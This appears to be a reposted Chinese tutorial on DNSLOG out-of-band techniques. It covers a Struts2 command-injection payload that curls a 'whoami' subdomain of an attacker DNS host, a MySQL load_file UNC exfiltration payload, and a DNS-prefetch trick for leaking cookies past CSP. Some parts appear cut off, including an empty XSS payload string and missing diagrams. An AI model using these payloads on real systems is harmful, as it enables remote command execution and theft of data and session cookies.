DNSLOG的原理
DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时,DNS的解析过程示意图。
其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。
DNSLOG工具
如果有自己的服务器和域名,可以自建一个这样的平台,直接使用BugScan团队开源的工具搭建即可:
https://github.com/BugScanTeam/DNSLog。
另外我们也可以使用在线平台:
http://admin.dnslog.link。
利用方式为go run main.go -u URL -c “command”。
Payload:
go run main.go -u http://www.exploit-target.com/struts2-rest-showcase/orders.xhtml -c 'curl "http://`whoami`.your-dnslog.com"' 根据语法规定,会先将双引号中的whoami命令执行并替换为结果,再执行整个的curl命令。可以在Web控制台下看到结果:
Payload: select load_file(concat(‘\\’, user(), ‘.your-dnslog.com’));
场景三: XSS绕过CSP
CSP(内容安全策略)是防御XSS最有效的手段之一。当我们发现一个网站有XSS漏洞,想利用XSS平台来打Cookie时,CSP会通过白名单的方式,禁止跨域加载脚本,恶意代码便会因此被阻挡在门外,导致此XSS无法利用。对此,我们可以使用DNS预解析突破CSP的阻拦。
DNS预解析(DNS Prefetching)是一种能够加快网页加载速度的技术,对于跨站的链接,由于每次都要进行一次DNS解析,会消耗掉很多时间。DNS预解析在浏览器空闲时,将跨站资源的域名转化为IP 地址并缓存,真正请求资源时就避免了解析的时间。
有趣的是,DNS预解析是默认开启的,并且我们可以通过rel=”dns-prefetch”来强制进行DNS预解析。由于DNS预解析可以绕过CSP进行解析,结合DNSLOG,我们即可窃取在CSP保护下的Cookie。
Payload:document.querySelector('body').innerHTML += " "
上面的Payload将Cookie中截取的重要字段进行简单的base64编码后,作为我们DNSLOG平台的二级域名,并在body中插入了相应的link标签对此域名进行强制DNS预解析。当触发XSS攻击时,可以在Web控制台下看到结果:
直接对R0ExLjIuMTY0MjI2NDMxNi4xNTMyNTc0NTg3解码即可得到Cookie。当然,这种方法的利用条件极为苛刻。首先,作为XSS攻击,此Payload过长,而使用短连接加载外部脚本则又会回到被CSP限制的原点;其次,根据DNS的规定,域名的长度是有限制的,有时可能无法将长Cookie完全带出。·本文仅分享一个抛砖引玉的思路,进一步的利用方式还有待开发。
结语
除了上面详细列出的例子之外,DNSLOG还可以利用在诸如Blind XXE和Blind SSRF之类的漏洞上,原理其实和命令盲注是一样的,在此不做详述。有兴趣的读者可以自行探索与验证。
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/204288.html原文链接:https://javaforall.net
